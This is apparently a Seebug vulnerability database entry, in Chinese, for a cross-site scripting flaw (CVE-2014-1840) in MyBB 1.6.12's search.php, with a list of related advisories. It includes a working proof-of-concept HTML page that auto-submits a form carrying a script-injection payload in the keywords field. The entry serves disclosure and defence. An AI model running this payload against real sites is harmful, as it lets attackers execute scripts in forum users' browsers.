Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:61502
HistoryFeb 20, 2014 - 12:00 a.m.

MyBB 'search.php'跨站脚本漏洞

2014-02-2000:00:00
Root
www.seebug.org
19

EPSS

0.002

Percentile

52.5%

JSON

BUGTRAQ ID: 65344
CVE(CAN) ID: CVE-2014-1840

MyBB是一个功能完整并且非常实用的论坛软件。

MyBB 1.6.12及其他版本没有正确过滤search.php的参数值,在实现上存在跨站脚本漏洞,攻击者可利用此漏洞在受影响站点上下文中的用户浏览器内执行任意脚本代码。
0
MyBB MyBB 1.6.12
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mybb.com/


                                                <html> 
  <body>
    <form name="exploit" action="http://www.example.com/mybb_1612/Upload/search.php" method="POST">
      <input type="hidden" name="action" value="do_search" />
      <input type="hidden" name="keywords" value="qor'("\2a<script>alert(/XSS/)</script>" />
    <script>document.exploit.submit(); </script>
    </form>
  </body>
</html>

Related

cve 1
nessus 1
cvelist 1
packetstorm 1
prion 1
openvas 1
nvd 1
cve
cve
CVE-2014-1840
2014-03-03 16:55:04
nessus
nessus
MyBB < 1.6.13 Multiple Vulnerabilities
2015-01-22 00:00:00
cvelist
cvelist
CVE-2014-1840
2014-03-03 16:00:00
packetstorm
packetstorm
MyBB 1.6.12 POST Cross Site Scripting
2014-02-03 00:00:00
prion
prion
Cross site scripting
2014-03-03 16:55:00
openvas
openvas
MyBB keywords Cross Site Scripting Vulnerability
2014-02-05 00:00:00
nvd
nvd
CVE-2014-1840
2014-03-03 16:55:04

EPSS

0.002

Percentile

52.5%

JSON
Related for SSV:61502
cve1nessus1cvelist1packetstorm1prion1openvas1nvd1